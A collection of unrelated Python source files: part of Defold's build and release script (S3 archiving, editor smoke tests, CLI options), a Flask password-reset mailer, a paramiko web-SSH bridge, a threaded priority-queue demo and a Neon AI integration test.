    # Set redirect urls so the editor can always be downloaded without knowing the latest sha1.
    # Used by www.defold.com/download
    # For example;
    # redirect: /editor2/channels/editor-alpha/Defold-x86_64-darwin.dmg -> /archive/<sha1>/editor-alpha/Defold-x86_64-darwin.dmg
    for name in ['Defold-x86_64-darwin.dmg', 'Defold-x86_64-win32.zip', 'Defold-x86_64-linux.zip']:
        key_name = 'editor2/channels/%s/%s' % (editor_channel, name)
        redirect = '%s/%s/%s/editor2/%s' % (editor_archive_path, release_sha1, editor_channel, name)
        self._log('Creating link from %s -> %s' % (key_name, redirect))
        key = bucket.new_key(key_name)
        key.set_redirect(redirect)
#
# END: RELEASE
# ------------------------------------------------------------
def release_to_github(self):
    # Delegate to the release_to_github module with this configuration.
    release_to_github.release(self)
def release_to_github_markdown(self):
    # Generate the markdown for a GitHub release (see release_to_github module).
    release_to_github.release_markdown(self)
def sync_archive(self):
    # Mirror this sha1's engine artefacts from S3 into $DYNAMO_HOME/archive,
    # in parallel, skipping editor/defoldsdk/launcher files.
    u = urlparse.urlparse(self.get_archive_path())
    bucket_name = u.hostname
    bucket = s3.get_bucket(bucket_name)
    local_dir = os.path.join(self.dynamo_home, 'archive')
    self._mkdirs(local_dir)
    if not self.thread_pool:
        self.thread_pool = ThreadPool(8)
    def download(key, path):
        # Worker executed on the thread pool for a single S3 key.
        self._log('s3://%s/%s -> %s' % (bucket_name, key.name, path))
        key.get_contents_to_filename(path)
    futures = []
    sha1 = self._git_sha1()
    # Only s3 is supported (scp is deprecated)
    # The pattern is used to filter out:
    # * Editor files
    # * Defold SDK files
    # * launcher files, used to launch editor2
    pattern = re.compile(r'(^|/)editor(2)*/|/defoldsdk\.zip$|/launcher(\.exe)*$')
    prefix = s3.get_archive_prefix(self.get_archive_path(), self._git_sha1())
    for key in bucket.list(prefix = prefix):
        rel = os.path.relpath(key.name, prefix)
        if not pattern.search(rel):
            p = os.path.join(local_dir, sha1, rel)
            self._mkdirs(os.path.dirname(p))
            f = Future(self.thread_pool, download, key, p)
            futures.append(f)
    # Calling a future blocks until its download has completed.
    for f in futures:
        f()
# ------------------------------------------------------------
# BEGIN: SMOKE TEST
#
def _download_editor2(self, channel, sha1):
    """Download the editor bundle for the current host platform.

    Returns the local path of the downloaded file, or None when no
    bundle exists for this host.
    """
    bundle_by_platform = {
        'x86_64-darwin': 'Defold-x86_64-darwin.dmg',
        'x86_64-linux' : 'Defold-x86_64-linux.zip',
        'x86_64-win32' : 'Defold-x86_64-win32.zip'
    }
    host = get_host_platform2()
    bundle = bundle_by_platform.get(host)
    if bundle is None:
        print("No editor2 bundle found for %s" % host)
        return None
    url = join(self.get_archive_path(), sha1, channel, 'editor2', bundle).replace("s3", "https").replace("\\", "/")
    return self._download(url)
def _install_editor2(self, path):
    # Install a downloaded editor bundle under tmp/smoke_test and return a
    # dict describing the install: install_path, resources_path, config and
    # (macOS only) the mounted volume and its filesystem device.
    host2 = get_host_platform2()
    install_path = join('tmp', 'smoke_test')
    if 'darwin' in host2:
        # Mount the dmg and copy Defold.app out of the mounted volume.
        out = run.command(['hdiutil', 'attach', path])
        print("cmd:" + out)
        # The last non-empty output line holds the device (first word) and
        # the mount point (last word).
        last = [l2 for l2 in (l1.strip() for l1 in out.split('\n')) if l2][-1]
        words = last.split()
        fs = words[0]
        volume = words[-1]
        install_path = join(install_path, 'Defold.app')
        self._copy_tree(join(volume, 'Defold.app'), install_path)
        result = {'volume': volume,
                  'fs': fs,
                  'install_path': install_path,
                  'resources_path': join('Defold.app', 'Contents', 'Resources'),
                  'config': join(install_path, 'Contents', 'Resources', 'config')}
        return result
    else:
        if 'win32' in host2 or 'linux' in host2:
            self._extract_zip(path, install_path)
        else:
            self._extract(path, install_path)
        install_path = join(install_path, 'Defold')
        result = {'install_path': install_path,
                  'resources_path': 'Defold',
                  'config': join(install_path, 'config')}
        return result
def _uninstall_editor2(self, info):
    """Remove an installed editor; on macOS also detach the mounted dmg."""
    platform = get_host_platform2()
    shutil.rmtree(info['install_path'])
    if 'darwin' in platform:
        run.command(['hdiutil', 'detach', info['fs']])
def _get_config(self, config, section, option, overrides):
    # Look up section.option from the launcher config, honouring explicit
    # overrides and expanding ${section.option} references recursively.
    combined = '%s.%s' % (section, option)
    if combined in overrides:
        return overrides[combined]
    # bootstrap.resourcespath is always resolved relative to the cwd.
    if section == 'bootstrap' and option == 'resourcespath':
        return '.'
    v = config.get(section, option)
    m = re.search(r"\${(\w+).(\w+)}", v)
    while m:
        s = m.group(1)
        o = m.group(2)
        # Substitute only the first occurrence, then re-scan so newly
        # produced references are expanded too.
        v = re.sub(r"\${(\w+).(\w+)}", self._get_config(config, s, o, overrides), v, 1)
        m = re.search(r"\${(\w+).(\w+)}", v)
    return v
def smoke_test(self):
    # Download and install the archived editor, start it together with
    # defold-robot (which drives it through share/smoke-test.edn), upload
    # the robot's html/css/png results to S3 and fail if the robot failed.
    sha1 = self._git_sha1()
    cwd = join('tmp', 'smoke_test')
    if os.path.exists(cwd):
        shutil.rmtree(cwd)
    path = self._download_editor2(self.channel, sha1)
    info = self._install_editor2(path)
    config = ConfigParser()
    config.read(info['config'])
    overrides = {'bootstrap.resourcespath': info['resources_path']}
    jdk = 'jdk11.0.1-p1'
    host2 = get_host_platform2()
    if 'win32' in host2:
        java = join('Defold', 'packages', jdk, 'bin', 'java.exe')
    elif 'linux' in host2:
        run.command(['chmod', '-R', '755', 'tmp/smoke_test/Defold'])
        java = join('Defold', 'packages', jdk, 'bin', 'java')
    else:
        java = join('Defold.app', 'Contents', 'Resources', 'packages', jdk, 'bin', 'java')
    jar = self._get_config(config, 'launcher', 'jar', overrides)
    vmargs = self._get_config(config, 'launcher', 'vmargs', overrides).split(',') + ['-Ddefold.log.dir=.', '-Ddefold.smoke.log=true']
    # Drop the auto-update url so the editor under test does not update itself.
    vmargs = filter(lambda x: not str.startswith(x, '-Ddefold.update.url='), vmargs)
    main = self._get_config(config, 'launcher', 'main', overrides)
    game_project = '../../editor/test/resources/geometry_wars/game.project'
    args = [java, '-cp', jar] + vmargs + [main, '--preferences=../../editor/test/resources/smoke_test_prefs.json', game_project]
    robot_jar = '%s/ext/share/java/defold-robot.jar' % self.dynamo_home
    robot_args = [java, '-jar', robot_jar, '-s', '../../share/smoke-test.edn', '-o', 'result']
    origdir = os.getcwd()
    origcwd = cwd
    if 'win32' in host2:
        # On windows, run from inside the directory instead of passing cwd.
        os.chdir(cwd)
        cwd = '.'
    print('Running robot: %s' % robot_args)
    robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
    time.sleep(2)
    self._log('Running editor: %s' % args)
    ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
    os.chdir(origdir)
    cwd = origcwd
    # Wait for the robot to finish, then stop the editor if still alive.
    output = robot_proc.communicate()[0]
    if ed_proc.poll() == None:
        ed_proc.terminate()
        ed_proc.wait()
    self._uninstall_editor2(info)
    result_archive_path = '/'.join(['int.d.defold.com', 'archive', sha1, self.channel, 'editor2', 'smoke_test'])
    def _findwebfiles(libdir):
        # Only html/css/png files from the robot's result dir are uploaded.
        paths = os.listdir(libdir)
        paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.html', '.css', '.png')]
        return paths
    for f in _findwebfiles(join(cwd, 'result')):
        self.upload_to_s3(f, 's3://%s/%s' % (result_archive_path, basename(f)))
    self.wait_uploads()
    self._log('Log: https://s3-eu-west-1.amazonaws.com/%s/index.html' % (result_archive_path))
    if robot_proc.returncode != 0:
        sys.exit(robot_proc.returncode)
    return True
def local_smoke(self):
    # Same robot-driven smoke test as smoke_test(), but running the editor
    # from the local dev environment via lein instead of a bundled build.
    host2 = get_host_platform2()
    cwd = './editor'
    if os.path.exists('editor/log.txt'):
        os.remove('editor/log.txt')
    game_project = 'test/resources/geometry_wars/game.project'
    args = ['./scripts/lein', 'with-profile', '+smoke-test', 'run', game_project]
    robot_jar = '../defold-robot/target/defold-robot-0.7.0-standalone.jar'
    robot_args = ['java', '-jar', robot_jar, '-s', '../share/smoke-test.edn', '-o', 'local_smoke_result']
    origdir = os.getcwd()
    origcwd = cwd
    if 'win32' in host2:
        # On windows, run from inside the directory and via sh.
        os.chdir(cwd)
        args = ['sh'] + args
        cwd = '.'
    print('Running robot: %s' % robot_args)
    robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
    time.sleep(2)
    self._log('Running editor: %s' % args)
    ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
    os.chdir(origdir)
    cwd = origcwd
    # Wait for the robot to finish, then stop the editor if still alive.
    output = robot_proc.communicate()[0]
    if ed_proc.poll() == None:
        ed_proc.terminate()
        ed_proc.wait()
    if robot_proc.returncode != 0:
        sys.exit(robot_proc.returncode)
    return True
#
# END: SMOKE TEST
# ------------------------------------------------------------
def get_archive_path(self, channel=None):
    """Return the archive path for *channel*, defaulting to self.channel."""
    effective_channel = channel if channel else self.channel
    return join(self.archive_path, effective_channel)
def get_archive_redirect_key(self, url):
    """Map a channel-qualified archive url back to its legacy redirect key (path)."""
    channel_prefix = self.get_archive_path().replace("\\", "/")
    legacy_url = url.replace(channel_prefix, self.archive_path)
    return urlparse.urlparse(legacy_url).path
def download_from_archive(self, src_path, dst_file):
    """Download *src_path* (relative to the channel archive) to *dst_file*."""
    self.download_from_s3(dst_file, join(self.get_archive_path(), src_path))
def upload_to_archive(self, src_file, dst_path):
    # Upload a file to the channel archive, then create a redirect key so
    # the legacy (un-channeled) s3 paths keep working.
    url = join(self.get_archive_path(), dst_path).replace("\\", "/")
    self._log("Uploading %s -> %s" % (src_file, url))
    self.upload_to_s3(src_file, url)
    # create redirect so that the old s3 paths still work
    # s3://d.defold.com/archive/channel/sha1/engine/* -> http://d.defold.com/archive/sha1/engine/*
    bucket = s3.get_bucket(urlparse.urlparse(url).netloc)
    redirect_key = self.get_archive_redirect_key(url)
    redirect_url = url.replace("s3://", "http://")
    key = bucket.new_key(redirect_key)
    key.set_redirect(redirect_url)
    self._log("Redirecting %s -> %s : %s" % (url, redirect_key, redirect_url))
def download_from_s3(self, path, url):
    # Download an s3:// url to a local path; any other scheme raises.
    url = url.replace('\\', '/')
    self._log('Downloading %s -> %s' % (url, path))
    u = urlparse.urlparse(url)
    if u.scheme == 's3':
        self._mkdirs(os.path.dirname(path))
        from boto.s3.key import Key
        bucket = s3.get_bucket(u.netloc)
        k = Key(bucket)
        k.key = u.path
        k.get_contents_to_filename(path)
        self._log('Downloaded %s -> %s' % (url, path))
    else:
        raise Exception('Unsupported url %s' % (url))
def upload_to_s3(self, path, url):
    # Queue an asynchronous upload of a local file to an s3:// url on the
    # thread pool. On win32 a plain single-call upload is used; elsewhere
    # a multipart upload with 64 MiB chunks, one thread per chunk.
    url = url.replace('\\', '/')
    self._log('Uploading %s -> %s' % (path, url))
    u = urlparse.urlparse(url)
    if u.scheme == 's3':
        bucket = s3.get_bucket(u.netloc)
        if not self.thread_pool:
            self.thread_pool = ThreadPool(8)
        p = u.path
        if p[-1] == '/':
            # Directory-style destination: keep the source file name.
            p += basename(path)
        def upload_singlefile():
            key = bucket.new_key(p)
            key.set_contents_from_filename(path)
            self._log('Uploaded %s -> %s' % (path, url))
        def upload_multipart():
            headers = {}
            contenttype, _ = mimetypes.guess_type(path)
            if contenttype is not None:
                headers['Content-Type'] = contenttype
            mp = bucket.initiate_multipart_upload(p, headers=headers)
            source_size = os.stat(path).st_size
            chunksize = 64 * 1024 * 1024 # 64 MiB
            chunkcount = int(math.ceil(source_size / float(chunksize)))
            def upload_part(filepath, part, offset, size):
                # Each part is uploaded from its own file handle/offset.
                with open(filepath, 'r') as fhandle:
                    fhandle.seek(offset)
                    mp.upload_part_from_file(fp=fhandle, part_num=part, size=size)
            _threads = []
            for i in range(chunkcount):
                part = i + 1
                offset = i * chunksize
                remaining = source_size - offset
                size = min(chunksize, remaining)
                args = {'filepath': path, 'part': part, 'offset': offset, 'size': size}
                self._log('Uploading #%d %s -> %s' % (i + 1, path, url))
                _thread = Thread(target=upload_part, kwargs=args)
                _threads.append(_thread)
                _thread.start()
            for i in range(chunkcount):
                _threads[i].join()
                self._log('Uploaded #%d %s -> %s' % (i + 1, path, url))
            # Complete only when every part made it; otherwise abort.
            if len(mp.get_all_parts()) == chunkcount:
                mp.complete_upload()
                self._log('Uploaded %s -> %s' % (path, url))
            else:
                mp.cancel_upload()
                self._log('Failed to upload %s -> %s' % (path, url))
        f = None
        if sys.platform == 'win32':
            f = Future(self.thread_pool, upload_singlefile)
        else:
            f = Future(self.thread_pool, upload_multipart)
        self.futures.append(f)
    else:
        raise Exception('Unsupported url %s' % (url))
def wait_uploads(self):
    """Block until every pending s3 upload future has completed."""
    for future in self.futures:
        future()
    self.futures = []
def _form_env(self):
    # Build the environment for child build processes: library/python/go
    # paths, Android and Emscripten SDK locations and misc tool settings.
    env = dict(os.environ)
    host = self.host2
    if 'x86-' in host:
        host = self.host
    ld_library_path = 'DYLD_LIBRARY_PATH' if self.host == 'darwin' else 'LD_LIBRARY_PATH'
    ld_library_paths = ['%s/lib/%s' % (self.dynamo_home, self.target_platform),
                        '%s/ext/lib/%s' % (self.dynamo_home, self.host)]
    if self.host == 'x86_64-linux':
        ld_library_paths.append('%s/ext/SDKs/linux/%s/%s/lib' % (self.dynamo_home, PACKAGES_LINUX_CLANG, PACKAGES_TAPI_VERSION))
    env[ld_library_path] = os.path.pathsep.join(ld_library_paths)
    pythonpaths = ['%s/lib/python' % self.dynamo_home,
                   '%s/build_tools' % self.defold,
                   '%s/ext/lib/python' % self.dynamo_home]
    env['PYTHONPATH'] = os.path.pathsep.join(pythonpaths)
    env['DYNAMO_HOME'] = self.dynamo_home
    env['ANDROID_HOME'] = os.path.join(self.dynamo_home, 'ext', 'SDKs', 'android-sdk')
    go_root = '%s/ext/go/%s/go' % (self.dynamo_home, self.target_platform)
    android_host = self.host
    if 'win32' in android_host:
        android_host = 'windows'
    paths = os.path.pathsep.join(['%s/bin/%s' % (self.dynamo_home, self.target_platform),
                                  '%s/bin' % (self.dynamo_home),
                                  '%s/ext/bin' % self.dynamo_home,
                                  '%s/ext/bin/%s' % (self.dynamo_home, host),
                                  '%s/bin' % go_root,
                                  '%s/platform-tools' % env['ANDROID_HOME'],
                                  '%s/ext/SDKs/%s/toolchains/llvm/prebuilt/%s-x86_64/bin' % (self.dynamo_home,PACKAGES_ANDROID_NDK,android_host)])
    env['PATH'] = paths + os.path.pathsep + env['PATH']
    go_paths = os.path.pathsep.join(['%s/go' % self.dynamo_home,
                                     join(self.defold, 'go')])
    env['GOPATH'] = go_paths
    env['GOROOT'] = go_root
    env['MAVEN_OPTS'] = '-Xms256m -Xmx700m -XX:MaxPermSize=1024m'
    # Force 32-bit python 2.7 on darwin.
    env['VERSIONER_PYTHON_PREFER_32_BIT'] = 'yes'
    env['VERSIONER_PYTHON_VERSION'] = '2.7'
    if self.no_colors:
        env['NOCOLOR'] = '1'
    env['EMSCRIPTEN'] = self._form_ems_path()
    env['EM_CACHE'] = join(self.get_ems_dir(), 'emscripten_cache')
    env['EM_CONFIG'] = join(self.get_ems_dir(), '.emscripten')
    # Make the bundled xhr2 node module resolvable without clobbering an
    # existing NODE_PATH.
    xhr2_path = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR, 'xhr2', 'package', 'lib')
    if 'NODE_PATH' in env:
        env['NODE_PATH'] = xhr2_path + os.path.pathsep + env['NODE_PATH']
    else:
        env['NODE_PATH'] = xhr2_path
    return env
if __name__ == '__main__':
    # Entry point: parse options/commands and run each named command as a
    # method on a Configuration instance. boto (S3 access) is bundled as an
    # egg and prepended to sys.path.
    boto_path = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../packages/boto-2.28.0-py2.7.egg'))
    sys.path.insert(0, boto_path)
    usage = '''usage: %prog [options] command(s)
Commands:
distclean        - Removes the DYNAMO_HOME folder
install_ext      - Install external packages
install_ems      - Install emscripten sdk
sync_archive     - Sync engine artifacts from S3
activate_ems     - Used when changing to a branch that uses a different version of emscripten SDK (resets ~/.emscripten)
build_engine     - Build engine
archive_engine   - Archive engine (including builtins) to path specified with --archive-path
install_go       - Install go dev tools
build_go         - Build go code
archive_go       - Archive go binaries
build_editor2    - Build editor
sign_editor2     - Sign editor
bundle_editor2   - Bundle editor (zip)
archive_editor2  - Archive editor to path specified with --archive-path
download_editor2 - Download editor bundle (zip)
notarize_editor2 - Notarize the macOS version of the editor
build_bob        - Build bob with native libraries included for cross platform deployment
archive_bob      - Archive bob to path specified with --archive-path
build_docs       - Build documentation
build_builtins   - Build builtin content archive
bump             - Bump version number
release          - Release editor
shell            - Start development shell
smoke_test       - Test editor and engine in combination
local_smoke      - Test run smoke test using local dev environment
Multiple commands can be specified
To pass on arbitrary options to waf: build.py OPTIONS COMMANDS -- WAF_OPTIONS
'''
    parser = optparse.OptionParser(usage)
    parser.add_option('--platform', dest='target_platform',
                      default = None,
                      choices = get_target_platforms(),
                      help = 'Target platform')
    parser.add_option('--skip-tests', dest='skip_tests',
                      action = 'store_true',
                      default = False,
                      help = 'Skip unit-tests. Default is false')
    parser.add_option('--skip-codesign', dest='skip_codesign',
                      action = 'store_true',
                      default = False,
                      help = 'skip code signing (engine and editor). Default is false')
    parser.add_option('--skip-docs', dest='skip_docs',
                      action = 'store_true',
                      default = False,
                      help = 'skip building docs when building the engine. Default is false')
    parser.add_option('--skip-builtins', dest='skip_builtins',
                      action = 'store_true',
                      default = False,
                      help = 'skip building builtins when building the engine. Default is false')
    parser.add_option('--skip-bob-light', dest='skip_bob_light',
                      action = 'store_true',
                      default = False,
                      help = 'skip building bob-light when building the engine. Default is false')
    parser.add_option('--disable-ccache', dest='disable_ccache',
                      action = 'store_true',
                      default = False,
                      help = 'force disable of ccache. Default is false')
    parser.add_option('--no-colors', dest='no_colors',
                      action = 'store_true',
                      default = False,
                      help = 'No color output. Default is color output')
    default_archive_path = CDN_UPLOAD_URL
    parser.add_option('--archive-path', dest='archive_path',
                      default = default_archive_path,
                      help = 'Archive build. Set ssh-path, host:path, to archive build to. Default is %s' % default_archive_path)
    default_package_path = CDN_PACKAGES_URL
    parser.add_option('--package-path', dest='package_path',
                      default = default_package_path,
                      help = 'Either an url to a file server where the sdk packages are located, or a path to a local folder. Reads $DM_PACKAGES_URL. Default is %s.' % default_package_path)
    parser.add_option('--set-version', dest='set_version',
                      default = None,
                      help = 'Set version explicitily when bumping version')
    parser.add_option('--channel', dest='channel',
                      default = 'stable',
                      help = 'Editor release channel (stable, beta, ...)')
    parser.add_option('--engine-artifacts', dest='engine_artifacts',
                      default = 'auto',
                      help = 'What engine version to bundle the Editor with (auto, dynamo-home, archived, archived-stable or a SHA1)')
    parser.add_option('--save-env-path', dest='save_env_path',
                      default = None,
                      help = 'Save environment variables to a file')
    parser.add_option('--notarization-username', dest='notarization_username',
                      default = None,
                      help = 'Username to use when sending the editor for notarization')
    parser.add_option('--notarization-password', dest='notarization_password',
                      default = None,
                      help = 'Password to use when sending the editor for notarization')
    parser.add_option('--notarization-itc-provider', dest='notarization_itc_provider',
                      default = None,
                      help = 'Optional iTunes Connect provider to use when sending the editor for notarization')
    parser.add_option('--github-token', dest='github_token',
                      default = None,
                      help = 'GitHub authentication token when releasing to GitHub')
    parser.add_option('--github-target-repo', dest='github_target_repo',
                      default = release_to_github.get_default_repo(),
                      help = 'GitHub target repo when releasing artefacts')
    parser.add_option('--github-sha1', dest='github_sha1',
                      default = None,
                      help = 'A specific sha1 to use in github operations')
    parser.add_option('--version', dest='version',
                      default = None,
                      help = 'Version to use instead of from VERSION file')
    parser.add_option('--codesigning-identity', dest='codesigning_identity',
                      default = None,
                      help = 'Codesigning identity for macOS version of the editor')
    parser.add_option('--windows-cert', dest='windows_cert',
                      default = None,
                      help = 'Path to codesigning certificate for Windows version of the editor')
    parser.add_option('--windows-cert-pass', dest='windows_cert_pass',
                      default = None,
                      help = 'Password to codesigning certificate for Windows version of the editor')
    options, all_args = parser.parse_args()
    # Everything after '--' that looks like an option is forwarded to waf.
    args = filter(lambda x: x[:2] != '--', all_args)
    waf_options = filter(lambda x: x[:2] == '--', all_args)
    if len(args) == 0:
        parser.error('No command specified')
    target_platform = options.target_platform
    if not options.target_platform:
        target_platform = get_host_platform2()
        if 'x86-' in target_platform:
            target_platform = get_host_platform() # we need even more cleanup to use "x86-linux" format for everything
    c = Configuration(dynamo_home = os.environ.get('DYNAMO_HOME', None),
                      target_platform = target_platform,
                      skip_tests = options.skip_tests,
                      skip_codesign = options.skip_codesign,
                      skip_docs = options.skip_docs,
                      skip_builtins = options.skip_builtins,
                      skip_bob_light = options.skip_bob_light,
                      disable_ccache = options.disable_ccache,
                      no_colors = options.no_colors,
                      archive_path = options.archive_path,
                      package_path = options.package_path,
                      set_version = options.set_version,
                      channel = options.channel,
                      engine_artifacts = options.engine_artifacts,
                      waf_options = waf_options,
                      save_env_path = options.save_env_path,
                      notarization_username = options.notarization_username,
                      notarization_password = options.notarization_password,
                      notarization_itc_provider = options.notarization_itc_provider,
                      github_token = options.github_token,
                      github_target_repo = options.github_target_repo,
                      github_sha1 = options.github_sha1,
                      version = options.version,
                      codesigning_identity = options.codesigning_identity,
                      windows_cert = options.windows_cert,
                      windows_cert_pass = options.windows_cert_pass)
    # Each positional argument is the name of a Configuration method.
    for cmd in args:
        f = getattr(c, cmd, None)
        if not f:
            parser.error('Unknown command %s' % cmd)
        else:
            start = time.time()
            print("Running '%s'" % cmd)
            f()
            c.wait_uploads()
            duration = (time.time() - start)
            print("'%s' completed in %.2f s" % (cmd, duration))
    print('Done')
|
email.py | from flask_mail import Message
from app import mail
from flask import render_template
from app import app
# for sending messages in background mode
from threading import Thread
def send_async_email(app, msg):
    # Runs in a worker thread: an application context is required for
    # Flask-Mail to read the app's mail configuration.
    with app.app_context():
        mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
    """Compose a message and dispatch it from a background thread."""
    message = Message(subject, sender=sender, recipients=recipients)
    message.body = text_body
    message.html = html_body
    sender_thread = Thread(target=send_async_email, args=(app, message))
    sender_thread.start()
def send_password_reset_email(user):
    # Email a password reset link to the user; the token is embedded in both
    # the plain-text and HTML templates.
    token = user.get_reset_password_token()
    send_email('[Microblog] Reset Your Password',
               sender=app.config['ADMINS'][0],
               recipients=[user.email],
               text_body=render_template('email/reset_password.txt',
                                         user=user, token=token),
               html_body=render_template('email/reset_password.html',
                                         user=user, token=token))
ssh.py | import paramiko
import socket
import json
from threading import Thread
class SSH:
    """Bridge between a websocket consumer and an interactive SSH shell.

    Data typed in the browser is forwarded to the SSH channel and the
    channel's output is streamed back over the websocket.
    """

    def __init__(self, websocker, message):
        # `websocker` is the websocket consumer used for all browser I/O;
        # `message` is a mutable status dict echoed back to the client on close.
        self.websocker = websocker
        self.message = message

    def connect(self, host, user, password=None, port=22, timeout=30,
                term='xterm', pty_width=80, pty_height=24):
        """Open the SSH session and an interactive PTY shell channel."""
        try:
            ssh_client = paramiko.SSHClient()
            ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh_client.connect(username=user, password=password, hostname=host, port=port, timeout=timeout)
            transport = ssh_client.get_transport()
            self.channel = transport.open_session()
            self.channel.get_pty(term=term, width=pty_width, height=pty_height)
            self.channel.invoke_shell()
            # Forward the login banner / first prompt (usually two reads).
            for i in range(2):
                recv = self.channel.recv(1024).decode('utf-8')
                self.websocker.send(recv)
        except socket.timeout:
            message = 'ssh 连接超时'  # "ssh connection timed out" (client-facing string kept as-is)
            self.websocker.send(message)
            self.close()
        except Exception:
            # FIX: was a bare `except:`; narrowed so SystemExit /
            # KeyboardInterrupt are not swallowed. Any SSH failure closes
            # the session.
            self.close()

    def resize_pty(self, cols, rows):
        """Resize the remote PTY to match the browser terminal."""
        self.channel.resize_pty(width=cols, height=rows)

    def django_to_ssh(self, data):
        """Send keystrokes received from the websocket to the SSH channel."""
        try:
            self.channel.send(data)
        except Exception:  # FIX: narrowed from bare except
            self.close()

    def websocket_to_django(self, data):
        """Send *data*, then pump SSH output to the websocket until EOF."""
        self.channel.send(data)
        try:
            while True:
                data = self.channel.recv(1024).decode('utf-8')
                if not len(data):
                    return
                self.websocker.send(data)
        except Exception:  # FIX: narrowed from bare except
            self.close()

    def close(self):
        """Notify the client of the closed session and shut the websocket."""
        self.message['status'] = 1
        self.message['message'] = 'Close Connection'
        message = json.dumps(self.message)
        self.websocker.send(message)
        #self.channel.close()
        self.websocker.close()

    def shell(self, data):
        """Run the output pump in a background thread so the caller isn't blocked."""
        Thread(target=self.websocket_to_django, args=(data,)).start()
|
priority_queues.py | import queue
import threading
import time
def do_work(item):
    """Report which worker thread pulled *item* off the queue."""
    consumer = threading.current_thread()
    print(f'{consumer} removed {item} from the queue')
def worker(queue):
    """Drain *queue* until it is empty (or a None sentinel is seen).

    FIX: the original checked `queue.empty()` and then called the blocking
    `queue.get()` — with two workers, another thread can steal the last item
    between the two calls and leave this worker blocked forever. Using
    `get_nowait()` and catching Empty removes the race.
    """
    from queue import Empty  # the parameter shadows the stdlib module name
    while True:
        try:
            item = queue.get_nowait()
        except Empty:
            break
        if item is None:
            print('item is none')
            break
        do_work(item)
        queue.task_done()
        time.sleep(1)
# Demo: two worker threads drain a PriorityQueue of (priority, value) pairs.
q = queue.PriorityQueue()
# Populate with duplicate (i, i) tuples; lowest priority is dequeued first.
for i in range(5):
    q.put((i, i))
for i in range(5):
    q.put((i, i))
print('Queue populated')
threads = []
for i in range(2):
    thread = threading.Thread(target=worker, args=(q,))
    thread.start()
    threads.append(thread)
# Wait for both consumers to finish before declaring the queue drained.
for thread in threads:
    thread.join()
print('Queue is empty')
'''
Queue populated
<Thread(Thread-1, started 123145446420480)> removed (0, 0) from the queue
<Thread(Thread-2, started 123145463209984)> removed (0, 0) from the queue
<Thread(Thread-1, started 123145446420480)> removed (1, 1) from the queue
<Thread(Thread-2, started 123145463209984)> removed (1, 1) from the queue
<Thread(Thread-1, started 123145446420480)> removed (2, 2) from the queue
<Thread(Thread-2, started 123145463209984)> removed (2, 2) from the queue
<Thread(Thread-1, started 123145446420480)> removed (3, 3) from the queue
<Thread(Thread-2, started 123145463209984)> removed (3, 3) from the queue
<Thread(Thread-1, started 123145446420480)> removed (4, 4) from the queue
<Thread(Thread-2, started 123145463209984)> removed (4, 4) from the queue
Queue is empty
'''
|
test_run_neon.py | # # NEON AI (TM) SOFTWARE, Software Development Kit & Application Development System
# # All trademark and other rights reserved by their respective owners
# # Copyright 2008-2021 Neongecko.com Inc.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os.path
import sys
import unittest
import pytest
from time import time, sleep
from multiprocessing import Process
from neon_utils.log_utils import LOG
from mycroft_bus_client import MessageBusClient, Message
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from neon_core.run_neon import start_neon, stop_neon
AUDIO_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "audio_files")
class TestRunNeon(unittest.TestCase):
    """Integration tests: boot Neon in a subprocess and exercise it over the bus."""

    @classmethod
    def setUpClass(cls) -> None:
        # Launch the full Neon stack and connect a shared bus client.
        cls.process = Process(target=start_neon, daemon=False)
        cls.process.start()
        cls.bus = MessageBusClient()
        cls.bus.run_in_thread()
        sleep(60)  # TODO: Better method to wait for process startup DM

    @classmethod
    def tearDownClass(cls) -> None:
        try:
            cls.bus.emit(Message("neon.shutdown"))
            cls.bus.close()
            cls.process.join(30)
            if cls.process.is_alive():
                # Graceful shutdown failed; force a stop and re-check.
                stop = Process(target=stop_neon, daemon=False)
                stop.start()
                stop.join(60)
                cls.process.join(15)
                # BUG FIX: the original tested `cls.process.is_alive` (the
                # bound method object, always truthy) instead of calling it,
                # so this raised even when the process had already exited.
                if cls.process.is_alive():
                    raise ChildProcessError("Process Not Killed!")
        except Exception as e:
            LOG.error(e)

    def setUp(self) -> None:
        # Ensure the shared bus connection is live before every test.
        self.bus.connected_event.wait(30)
        while not self.bus.started_running:
            sleep(1)

    def test_messagebus_connection(self):
        """A fresh bus client can connect to the running messagebus."""
        from mycroft_bus_client import MessageBusClient
        bus = MessageBusClient()
        bus.run_in_thread()
        self.assertTrue(bus.started_running)
